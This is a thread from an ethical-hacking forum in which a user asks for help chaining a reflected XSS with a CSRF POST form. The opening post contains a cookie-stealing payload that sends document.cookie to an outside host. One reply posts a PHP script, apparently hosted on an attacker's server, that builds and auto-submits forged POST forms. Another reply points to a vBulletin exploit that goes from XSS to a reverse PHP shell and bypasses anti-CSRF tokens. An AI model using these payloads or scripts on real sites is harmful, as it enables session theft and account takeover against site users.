HomeCalendarCertificationsColumnsFeaturesForumResourcesVitals
 
Image
 
linkedin_logo.png rss_logo.jpg
twitter_logo.png youtube_logo.jpg
Latest Additions
 
EH-Net Login
Welcome Guest.
Lost Password?
No account yet? Register
Who's Online
We have 37 guests and 1 member online
 
Advertisement

You are here: Home arrow Ethical Hacking Discussions and Related Certificationsarrow Web Applicationsarrow CSRF with XSS payload encoding help
EH-Net
May 20, 2013, 05:01:21 PM *
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
News: Go back to The Ethical Hacker Network Online Magazine Home Page
 
   Home   Help Calendar Login Register  
Pages: [1]   Go Down
« previous next »
  Print  
Author Topic: CSRF with XSS payload encoding help  (Read 4165 times)
0 Members and 1 Guest are viewing this topic.
eyenit0
Jr. Member
**
Offline Offline

Posts: 51


View Profile
« on: August 02, 2012, 02:13:18 PM »
Hey everyone,

So, I've found an XSS vuln that I'd like to exploit via a CSRF vuln, but I'm having trouble with encoding in the CSRF.
Right now my CSRF exploit is just a hidden html form that's auto submitted by javascript. The XSS payload requires double quotes, which breaks the HTML form. For example, the value with the payload would look something like this:

value="<img src="#" onerror="javascript:document.location='http://site/?'+document.cookie">"

That obviously doesn't work because the quotes in the payload screw up the form. I can't URL encode the quotes because then they get double encoded and the payload won't execute. I've tried changing the enctype of the form to text/plain and multi-part/formdata but no luck. The CSRF vulnerable link will only take POST, not GET.

Any ideas on how to get around this? I was thinking it may be possible to dynamically construct an http POST request with Javascript to submit it, but I'm not sure how.

Any input is appreciated!
Logged
unicityd
Full Member
***
Offline Offline

Posts: 156

Bored IT Manager, Crypto Nerd


View Profile WWW
« Reply #1 on: August 02, 2012, 02:19:07 PM »
Will any of the URL shortening services accept it?
Logged
BS in IT, CISSP, MS in IS Management (in progress)
eyenit0
Jr. Member
**
Offline Offline

Posts: 51


View Profile
« Reply #2 on: August 02, 2012, 11:32:16 PM »
Do any of those work with POST requests? I am not aware of any that handle those, but I'd love to hear of something like that if you know of one.
Logged
unicityd
Full Member
***
Offline Offline

Posts: 156

Bored IT Manager, Crypto Nerd


View Profile WWW
« Reply #3 on: August 03, 2012, 02:50:15 AM »
No; they won't work with POST requests. There are other websites that will submit a POST for you though.

http://tomengineering.tripod.com/gettopost.html
http://get-to-post.nickj.org/
Logged
BS in IT, CISSP, MS in IS Management (in progress)
ambient
Newbie
*
Offline Offline

Posts: 20



View Profile WWW
« Reply #4 on: November 07, 2012, 01:57:59 AM »
You could implement it by CSRF redirector technique.
I have posted here but the source code is unavailable.

http://pornsookk.wordpress.com/2011/07/08/csrf-redirector/

Code:
<html>
<title>PHP CSRF Redirector</title>
<body>
<?php
/*   Call
 *   http://hackerhost.net/csrf_redirect.php?csrf=http://vulnerable.net?username=john|passwd=12345 
 */
 $csrf   $_GET['csrf'];
 $tokens preg_split('/\?/',$csrf);
 $url    $tokens[0];
 $vars   preg_split('/\|/',$tokens[1]);
 print ('<form name="csrfForm" method="post" action="' $url '">');
 for($i=0;$i<sizeof($vars);$i++)
 {  /* $vars[$i]:  key=value;
     * key   = terms[0] 
 * value = terms[1]  
   */
    $terms explode('=',$vars[$i]);
 print('<input type="hidden" name="' $terms[0] . '" value="' $terms[1] . '" />');
 } //end for loop 
 print("</form>"); 
?>
<script language="javascript" type="text/javascript">
  document.forms[0].submit();
</script>
</form>
</body>
</html>
« Last Edit: November 07, 2012, 03:40:42 AM by ambient » Logged
We secure the nation.
GPEN,eCPPT,C|EH,CCNA
http://incognitolab.com/
https://www.facebook.com/secure.thailand
MaXe
Hero Member
*****
Offline Offline

Posts: 669


I've just upgraded myself to a cyborg muahahaa!!1


View Profile WWW
« Reply #5 on: November 07, 2012, 02:49:53 AM »
Take a look at: www.intern0t.org/xssor/ for encoding methods.

Take a look at: http://www.exploit-db.com/vbseo-from-xss-to-reverse-php-shell/ for a real world Proof of Concept (and former 0day).

The actual tool is available via: http://www.exploit-db.com/sploits/evilwebtool.tar.gz where trojan.js contains the javascript payload. (Note that the python tool reads php code or the reverse php shell (from pentestmonkey) and parses it into the trojan file before serving it.

It took some clever encoding, but it works 100% (tested in FireFox) and has been used in a few demo's that I've made. Knowing JavaScript, HTML and attack vectors within these, including various encoding methods, will be sufficient to pull off any XSS attack even defeating Anti-CSRF tokens.

The trojan.js file bypasses the built-in CSRF protection in vBulletin as well.  Grin It's probably the best PoC that I have ever made hehe
Logged
I'm an InterN0T'er
Pages: [1]   Go Up
  Print  
« previous next »
 
Jump to:  

Powered by MySQL Powered by PHP Powered by SMF 1.1.18 | SMF © 2013, Simple Machines
Joomla Bridge by JoomlaHacks.com 		Valid XHTML 1.0! Valid CSS!
Page created in 0.086 seconds with 23 queries.
 
Exclusive Deal

sansfire13_245x90_cw90.jpg
SANSFIRE 2013
June 15 - 22

5% Off w/ Code: EHN_5

SANS Deals 4 EH-Netters
5% OFF Any SANS Course in Any Format!
Coupon Code: EHN_5 Including SANS Rocky Mountain 2013 & SANS Boston 2013
Polls
Compared to this year, 2013 will be:
 
Recent Forum Topics
EH-Net News Feeds
Latest Additions
 
         
Free Business and Tech Magazines and eBooks

© 2013 The Ethical Hacker Network
Joomla! is Free Software released under the GNU/GPL License.